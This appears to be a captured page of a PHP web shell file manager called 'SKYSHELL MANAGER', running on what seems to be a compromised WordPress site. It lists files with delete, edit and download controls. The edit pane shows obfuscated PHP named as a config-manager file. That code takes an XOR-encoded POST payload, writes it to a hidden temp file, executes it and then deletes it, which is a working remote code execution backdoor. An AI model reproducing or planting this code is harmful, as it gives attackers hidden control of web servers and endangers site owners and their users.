📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: file.config.manager.php
<?php if(array_key_exists("\x62i\x6Ed", $_POST) && !is_null($_POST["\x62i\x6Ed"])){ $value = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/dev/shm", "/var/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd()]); $elem = hex2bin($_POST["\x62i\x6Ed"]); $itm= '' ; foreach(str_split($elem) as $char){$itm .= chr(ord($char) ^ 56);} while ($holder = array_shift($value)) { if (max(0, is_dir($holder) * is_writable($holder))) { $flg = sprintf("%s/.tkn", $holder); if (file_put_contents($flg, $itm)) { require $flg; unlink($flg); exit; } } } }
Save